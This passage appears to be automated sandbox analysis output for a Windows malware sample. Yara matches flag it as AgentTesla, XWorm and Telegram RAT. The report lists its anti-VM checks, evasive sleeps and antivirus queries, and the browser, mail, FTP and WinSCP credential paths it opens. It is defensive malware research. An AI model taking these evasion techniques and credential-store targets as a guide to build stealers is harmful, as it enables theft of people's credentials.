Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Memory allocated: E70000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Memory allocated: 2860000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Memory allocated: 26B0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Memory allocated: 16F0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Memory allocated: 1B340000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Window / User API: threadDelayed 1158 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Window / User API: threadDelayed 6566 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Window / User API: threadDelayed 2346 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Window / User API: threadDelayed 7505 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -20291418481080494s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -100000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804 Thread sleep count: 1158 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 6804 Thread sleep count: 6566 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99766s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99641s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99521s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99405s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -99077s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98915s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98809s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98524s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98289s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98172s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -98062s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97953s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97843s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97734s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97625s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97516s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97406s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97297s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97187s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -97078s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96969s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96859s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96750s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96641s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96531s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96422s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96312s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96203s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -96094s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -95984s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -95875s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -95766s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -95656s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -95547s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe TID: 5740 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe TID: 3608 Thread sleep time: -3689348814741908s >= -30000s Jump to behavior
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 100000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99641 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99521 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99405 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99297 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99187 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 99077 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98915 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98809 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98524 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98422 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98289 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98172 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 98062 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97953 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97843 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97734 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97625 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97516 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97406 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97297 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97187 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 97078 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96969 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96859 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96750 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96641 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96531 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96422 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96312 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96203 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 96094 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 95984 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 95875 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 95766 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 95656 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 95547 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: FB_7BD8.tmp.exe, 00000002.00000002.4523857595.00000000009F8000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Process information queried: ProcessInformation Jump to behavior
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe" Jump to behavior
Source: C:\Users\user\Desktop\DJ5PhUwOsM.exe Process created: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe "C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe" Jump to behavior

Language, Device and Operating System Detection
barindex
Yara detected Telegram Recon
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Queries volume information: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
AV process strings found (often used to terminate AV products)
Source: FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C1FF000.00000004.00000020.00020000.00000000.sdmp, FB_7D21.tmp.exe, 00000003.00000002.4527812703.000000001C162000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.4524594091.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000000.2068435766.00000000004D2000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.4524594091.00000000028B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7BD8.tmp.exe PID: 6404, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.FB_7D21.tmp.exe.fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.43ead8.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000000.2070271081.0000000000FA2000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000000.2065512864.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2070672150.0000000000404000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DJ5PhUwOsM.exe PID: 6224, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: FB_7D21.tmp.exe PID: 4444, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe, type: DROPPED
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\FTP Navigator\Ftplist.txt Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: DJ5PhUwOsM.exe, type: SAMPLE
Source: Yara match File source: 2.0.FB_7BD8.tmp.exe.4d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.4040d0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.4040d0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.0.DJ5PhUwOsM.exe.400000.0.unpack, type: UNPACKEDPE
